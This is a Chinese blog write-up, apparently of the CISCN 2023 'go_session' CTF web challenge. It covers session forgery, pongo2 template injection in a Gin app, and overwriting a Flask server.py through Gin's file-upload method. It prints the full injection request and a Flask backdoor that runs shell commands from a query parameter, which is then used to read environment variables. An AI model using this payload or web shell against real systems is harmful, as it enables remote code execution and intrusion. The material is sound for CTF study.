[CISCN 2023 初赛]go_session

已于 2023-11-07 12:36:16 修改
阅读量441 收藏
点赞数
分类专栏: 国赛 文章标签: golang iphone 开发语言 web安全 python
于 2023-11-07 12:35:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73512445/article/details/134261219
版权

文章目录

考点

session伪造,pongo2模板注入,debug模式覆盖源文件

代码审计

main.go

package main

import (
	"github.com/gin-gonic/gin"
	"main/route"
)

func main() {
	r := gin.Default()
	r.GET("/", route.Index)
	r.GET("/admin", route.Admin)
	r.GET("/flask", route.Flask)
	r.Run("0.0.0.0:80")
}

main函数给了三个路由,分别对应根路径 //admin/flask
我们追踪到route.go

route.go

package route

import (
	"github.com/flosch/pongo2/v6"
	"github.com/gin-gonic/gin"
	"github.com/gorilla/sessions"
	"html"
	"io"
	"net/http"
	"os"
)

var store = sessions.NewCookieStore([]byte(os.Getenv("SESSION_KEY")))

func Index(c *gin.Context) {
	session, err := store.Get(c.Request, "session-name")
	if err != nil {
		http.Error(c.Writer, err.Error(), http.StatusInternalServerError)
		return
	}
	if session.Values["name"] == nil {
		session.Values["name"] = "guest"
		err = session.Save(c.Request, c.Writer)
		if err != nil {
			http.Error(c.Writer, err.Error(), http.StatusInternalServerError)
			return
		}
	}

	c.String(200, "Hello, guest")
}

func Admin(c *gin.Context) {
	session, err := store.Get(c.Request, "session-name")
	if err != nil {
		http.Error(c.Writer, err.Error(), http.StatusInternalServerError)
		return
	}
	if session.Values["name"] != "admin" {
		http.Error(c.Writer, "N0", http.StatusInternalServerError)
		return
	}
	name := c.DefaultQuery("name", "ssti")
	xssWaf := html.EscapeString(name)
	tpl, err := pongo2.FromString("Hello " + xssWaf + "!")
	if err != nil {
		panic(err)
	}
	out, err := tpl.Execute(pongo2.Context{"c": c})
	if err != nil {
		http.Error(c.Writer, err.Error(), http.StatusInternalServerError)
		return
	}
	c.String(200, out)
}

func Flask(c *gin.Context) {
	session, err := store.Get(c.Request, "session-name")
	if err != nil {
		http.Error(c.Writer, err.Error(), http.StatusInternalServerError)
		return
	}
	if session.Values["name"] == nil {
		if err != nil {
			http.Error(c.Writer, "N0", http.StatusInternalServerError)
			return
		}
	}
	resp, err := http.Get("http://127.0.0.1:5000/" + c.DefaultQuery("name", "guest"))
	if err != nil {
		return
	}
	defer resp.Body.Close()
	body, _ := io.ReadAll(resp.Body)

	c.String(200, string(body))
}

这是一个路由文件,使用了Gin框架和pongo2的模板引擎

主要定义了三个路由函数,接下来逐步分析

Index函数

func Index(c *gin.Context) {
	session, err := store.Get(c.Request, "session-name")
	if err != nil {
		http.Error(c.Writer, err.Error(), http.StatusInternalServerError)
		return
	}
	if session.Values["name"] == nil {
		session.Values["name"] = "guest"
		err = session.Save(c.Request, c.Writer)
		if err != nil {
			http.Error(c.Writer, err.Error(), http.StatusInternalServerError)
			return
		}
	}

	c.String(200, "Hello, guest")
}

Index函数用于处理根路径下的请求,它的参数是一个指向gin.Context的指针,而gin.Context是Gin框架中的一种上下文对象类型。它是一个包含了当前http请求和响应的信息、操作方法和属性的结构体,用于在处理http请求时传递和操作这些信息。同时gin.Context还提供了一系列的方法用于处理这些信息,这个将是我们后面利用的重点

首先是接收session的参数name,然后判断会话中的name值是否为空,如果为空,就会将name的值设置为guest,然后将会话保存到请求中,最后使用String方法返回一个状态码和一个字符串。

在这里插入图片描述

Admin函数

func Admin(c *gin.Context) {
	session, err := store.Get(c.Request, "session-name")
	if err != nil {
		http.Error(c.Writer, err.Error(), http.StatusInternalServerError)
		return
	}
	if session.Values["name"] != "admin" {
		http.Error(c.Writer, "N0", http.StatusInternalServerError)
		return
	}
	name := c.DefaultQuery("name", "ssti")
	xssWaf := html.EscapeString(name)
	tpl, err := pongo2.FromString("Hello " + xssWaf + "!")
	if err != nil {
		panic(err)
	}
	out, err := tpl.Execute(pongo2.Context{"c": c})
	if err != nil {
		http.Error(c.Writer, err.Error(), http.StatusInternalServerError)
		return
	}
	c.String(200, out)
}

函数首先判断是否为空,然后判断是否为admin,如果是name为admin,那么从查询参数中获取名为 name 的值,然后EscapeString函数进行转义,接着使用pongo2模板引擎打印字符串

Flask函数

func Flask(c *gin.Context) {
	session, err := store.Get(c.Request, "session-name")
	if err != nil {
		http.Error(c.Writer, err.Error(), http.StatusInternalServerError)
		return
	}
	if session.Values["name"] == nil {
		if err != nil {
			http.Error(c.Writer, "N0", http.StatusInternalServerError)
			return
		}
	}
	resp, err := http.Get("http://127.0.0.1:5000/" + c.DefaultQuery("name", "guest"))
	if err != nil {
		return
	}
	defer resp.Body.Close()
	body, _ := io.ReadAll(resp.Body)

	c.String(200, string(body))
}

函数判断参数name值是否为空,如果为空则返回报错信息(可能有我们需要的信息)

这里有个坑,也就是下面这句

resp, err := http.Get("http://127.0.0.1:5000/" + c.DefaultQuery("name", "guest"))

如果我们想要给flask服务传入参数name=123,实际上要构造的是./flask?name=%3fname=123

解题过程

伪造session

题目大概逻辑已经清楚了,首要问题就是如何去伪造session,也就是如何去得到SESSION_KEY

var store = sessions.NewCookieStore([]byte(os.Getenv("SESSION_KEY")))

执行过程:设置了基于 Cookie 的会话存储,并使用环境变量中的 SESSION_KEY 值作为会话密钥

由于我们无法知道环境变量,只能对SESSION_KEY进行猜测,就是并未设置SESSION_KEY,所以我们可以本地搭环境得到session值去伪造

首先修改源码
如果name不为admin,将其值设置为admin
在这里插入图片描述开启代理

go env -w GOPROXY=https://goproxy.io,direct

然后运行下main.go
在这里插入图片描述
访问127.0.0.1:80,得到cookie
在这里插入图片描述
访问./admin,bp抓包修改session
成功访问
在这里插入图片描述
伪造成功后我们再看看还有什么能获取的信息
所以我们尝试读去下报错信息

获取server.py

我们访问./Flask,并且传参name为空
(注意session得为admin)
在这里插入图片描述得到html代码,我们随便打开个网页复制进去
可以发现开启了debug,说明开启了热加载功能,允许在对代码进行更改后自动重新加载应用程序。这意味着可以在不必手动停止和重启 Flask 应用程序的情况下查看对代码的更改。
在这里插入图片描述
我们知道pongo2模板引擎存在注入点,可以执行go的代码,所以我们可以先上传文件覆盖server.py,再访问/flask路由,来执行命令

构造payload

使用gin包的SaveUploadedFile()进行文件上传

func (c *Context) SaveUploadedFile(file *multipart.FileHeader, dst string) error

  • 第一个获取表单中的文件,第二个参数为保存的目录

所以使用ssti的payload为

{{c.SaveUploadedFile(c.FormFile("file"),"/app/server.py")}}

但是我们在前面代码审计的时候知道,双引号会被html.EscapeString转义进行编码,所以需要绕过

我们利用gin中的Context.HandlerName()

HandlerName
返回主处理程序的名称。例如,如果处理程序是“handleGetUsers()”,此函数将返回“main.handleGetUsers”

所以如果是在Admin()里,返回的就是main/route.Admin
然后配合过滤器last获取到最后一个字符串也就是文件名为n

还有一个Context.Request.Referer()Request.Referer

返回header里的Referer的值

我们可以在请求中的Referer的值添加为/app/server.py

所以构造最终payload

{{c.SaveUploadedFile(c.FormFile(c.HandlerName()|last),c.Request.Referer())}

但是在数据包中添加请求头时还要添加 Content-Type 头

Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8ALIn5Z2C3VlBqND

对于添加这个头的解释是

对表单提交,浏览器会自动设置合适的 Content-Type 请求,同时 生成一个唯一的边界字符串,并在请求体中使用这个边界字符串将不的表单字段和文件进行分隔。如果表单中包含文件上传的功能,需要 使用 multipart/form-data 类型的请求体格式。

注意分隔符的开始和结束格式

--分隔符
...
...
--分隔符--

覆盖server.py

访问./admin,数据包如下

GET /admin?name={{c.SaveUploadedFile(c.FormFile(c.HandlerName()|last),c.Request.Referer())}} HTTP/1.1
Host: node5.anna.nssctf.cn:28120
Referer: /app/server.py
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8ALIn5Z2C3VlBqND
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: session=MTY5OTAxNjY1NnxEdi1CQkFFQ180SUFBUkFCRUFBQVBQLUNBQUlHYzNSeWFXNW5EQWdBQm5OdmJIWmxaQU5wYm5RRUFnQUFCbk4wY21sdVp3d05BQXRqYUdGc2JHVnVaMlZKWkFOcGJuUUVBd0Rfa0E9PXx0Nhf11tos024WRtfbo-1x1tZkxqxiP2paIr7GAXXEqA==; session-name=MTY5OTMxNjI2NHxEWDhFQVFMX2dBQUJFQUVRQUFBal80QUFBUVp6ZEhKcGJtY01CZ0FFYm1GdFpRWnpkSEpwYm1jTUJ3QUZZV1J0YVc0PXzsOnx_9Q3qCs6AZzIOC6h8UsEAuK5LiaOsjUjumSslrQ==
Upgrade-Insecure-Requests: 1
Content-Length: 423

------WebKitFormBoundary8ALIn5Z2C3VlBqND
Content-Disposition: form-data; name="n"; filename="1.py"
Content-Type: text/plain

from flask import *
import os
app = Flask(__name__)

@app.route('/')
def index():
    name = request.args['name']
    file=os.popen(name).read()
    return file

if __name__ == "__main__":
    app.run(host="0.0.0.0", port=5000, debug=True)
------WebKitFormBoundary8ALIn5Z2C3VlBqND--

可以看到上传成功
在这里插入图片描述

命令执行

然后就在./flask去命令执行,因为我们知道该路由获取name也是c.DefaultQuery

name=?name=env,拼接出来的url是
http://127.0.0.1:5000/?name=env
但写成name=env,拼接出来的url就是
http://127.0.0.1:5000/env

然后在环境变量找到flag

/flask?name=?name=env

在这里插入图片描述

_rev1ve
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[CISCN 2023 初赛]go_session 解题思路&过程
iamblackcat's blog
07-23 1063
[CISCN 2023 初赛]go_session 解题思路&过程
2023全国大学生信息安全竞赛(ciscn)初赛题解
热门推荐
返璞归真的博客
05-28 1万+
2023全国大学生信息安全竞赛(ciscn)部分题解
6.29
网安菜鸡学习笔记
06-29 76
dg-publish: true [CISCN 2023 初赛]go_session [session伪造] 三个路由 r.GET("/", route.Index) r.GET("/admin", route.Admin) r.GET("/flask", route.Flask) 逐个分析 route包里面首先获取了环境变量中的SESSION_KEY func Index(c *gin...
2023CISCN初赛
这个人很懒,什么都懒得写
06-04 970
随便写写
2023ciscn初赛 Unzip
2202_75317918的博客
06-16 1082
2023ciscn初赛 Unzip
[2023CISCN]国赛初赛WEB题目复现
qq_42585535的博客
10-23 547
最近几个月在学免杀,JAVA安全以及JS相关内容,导致CTF摆了很久,这次复现国赛题目就当做恢复训练了。
Go 如何使用session
无风的雨
12-07 1万+
Go 语言实现操作session不像cookie那样,net/http包里有现成函数可以很方便的使用,一些web服务用到session的话,没办法地自己敲代码实现。 Go具体实现session: 服务端可以通过内存、redis、数据库等存储session数据(本例只有内存)。 通过cookie将唯一SessionID发送到客户端 session.go package session impo...
NOIP提高组初赛复习3_栈.pdf
08-26
NOIP提高组初赛复习3_栈 栈是计算机科学中一种特殊的线性表,限定只能在表尾进行插入、删除操作的线性表。栈的特点是后进先出(LIFO,Last In First Out),即最后入栈的元素最先出栈。栈顶(top)是允许插入和删除...
2023初赛模拟 J 组(带答案).pdf
03-30
根据给定文件的部分内容,我们可以总结出以下几个关键知识点: ### 1. 互联网域名系统(DNS)中的顶级域名 **知识点解析**: - **顶级域名(TLD, Top-Level Domain)**:顶级域名位于域名系统的最顶层,用来表示...
2008_初赛_答案_C++.pdf
05-08
根据提供的文件信息,我们可以推断出这是一份关于2008年全国青少年信息学奥林匹克联赛(NOIP)普及组C++语言部分的参考答案及评分标准。下面将针对这份资料中的知识点进行详细的解读。 ### 单项选择题知识点 #### 1....
电赛初赛_1294_
10-02
【电赛初赛_1294_】项目是一个基于德州仪器(TI)1294芯片实现的呼吸灯设计。这个项目的核心是利用1294芯片的强大功能来控制LED灯光的亮度和闪烁频率,从而模拟出类似呼吸效果的照明效果。在电子竞赛中,这种设计...
CSP-j2023初赛
04-25
CSP-J 2023 初赛概述 - **认证名称**:CCF CSP-J 2023 第一轮 - **语言**:C++ - **考试时间**:2023年9月16日09:30~11:30 - **试题结构**: - 总页数:10页 - 答题纸页数:1页 - 满分:100分 - 题型包括单项...
[2022 CISCN]初赛 web题目复现
cosmoslin的博客
07-04 4047
源码泄露www.zip,用网上的链子直接打 online_crt 考点:CVE-2022-1292SSRF项目后端为python+go,其中python部署在外网,go通过python转发到内网先看python,一共有四个路由:为主界面生成一个x509证书调用c_rehash创建证书链接通过代理访问go内网服务再来看go,有一个admin路由,用以重命名证书文件题目的考点为CVE-2022-1292,是c_rehash的一个命令注入漏洞c_rehash是openssl中的一个用perl编写的脚本工具,用于批
2022CISCN初赛 WP
Lum1n0us's Blog
05-29 1235
文章目录Crypto签到电台 Crypto 签到电台 在公众号找到提示 在“标准电码表”找“弼时安全到达了”所对应的7个电码,再跟“密码本”的前7*4个数字分别逐位进行“模十算法”(加不进位、减不借位),所得到的就是要发送的电码。 发送电码前先发送“s”启动,即按3个“.”,这个发送电报的过程可以使用抓包软件进行抓取,可方便输入电报。 “弼时安全到达了”所对应的7个电码: 1732 2514 1344 0356 0451 6671 0055 模十算法示例:1732与6378得到7000 发包示例:/sen
ciscn-easygo-go语言逆向分析
playmaker的博客
04-21 3160
是一个64位程序,拿到题目放入IDA中分析,一堆函数没找到主函数。题目提示又是gogogo就想到了最近常听到的go语言。查了一下资料知道找不到main函数的go语言程序,是无符号的。为了方便分析使用脚本IDAGolangHelper-master去符号信息还原。 ALT+F7引用这个脚本,出现如下界面,前面两个检测版本,检测出为1.8 or 1.9 or 1.10 选择一下下面的版本,把剩余三个按...
Golang 泛型详解
07-25 853
/ 自定义一个新类型 MapTT:类型形参。定义 MapT 时 T 代表的类型并不确定,类似一个占位符。:类型约束。指定 T 仅可接受哪些类型。中括号内定义形参类型,称为形参类型列表。其中,类型约束可以包上 interface{}m[T] = valreturn m// 或简写为type T interface{int|int32|float32|string} // 自定义类型约束。
Golang处理Word文档模板实现标签填充|表格插入|图标绘制和插入|删除段落|删除标签
最新发布
宋发元
07-30 258
本教程将指导您使用Golang处理Word文档模板,包括自定义标签填充、动态插入表格、绘制图表和插入图表。我们将使用unioffice库和gg库来完成这些任务。
【VSCode实战】Golang无法跳转问题竟是如此简单
weixin_42206314的博客
07-26 831
workspace是golang1.18版本引入的新概念,就是VSCode打开的工作目录中,若是有多个mod文件,它会不知道使用哪一个,也就无法定位。但工作目录中,若是只有一个项目,那么它自然可以找到,也就可以正常“转到定义”。,开头说到了在VSCode中Golang无法跳转的问题,但文章的最后也没给出解决方案,只解决了安装Go插件的依赖问题。2.在已安装的扩展里面,找到Go扩展,点击右下角的齿轮标记,选择扩展设置,也会打开1的界面。无法跳转的问题,其实还是很简单的,只是被网上各种冗余信息误导了。
Golang | Leetcode Golang题解之第303题区域和检索-数组不可变
weixin_66442839的博客
07-30 239
Golang | Leetcode Golang题解之第303题区域和检索-数组不可变
OSError: [WinError 123] 文件名、目录名或卷标语法不正确。: 'D:\\[CISCN 2023 初赛]\\img_5e1b8d1b1db258f45d1059dbafc10f11\tmp4'
05-29
这个错误提示是在Windows系统下发生的,意思是文件名、目录名或卷标语法不正确。具体而言,是在路径名中有不合法的字符或格式。 根据错误提示信息,路径是'D:\\[CISCN 2023 初赛]\\img_5e1b8d1b1db258f45d1059dbafc10f11\tmp4',可以看出可能是路径名中包含了中括号"[]"这样的特殊字符,而这些字符在Windows系统中是不允许出现在路径名中的。因此,需要修改路径名中的这些特殊字符,或者将文件复制到不包含这些特殊字符的路径下。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

_rev1ve

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值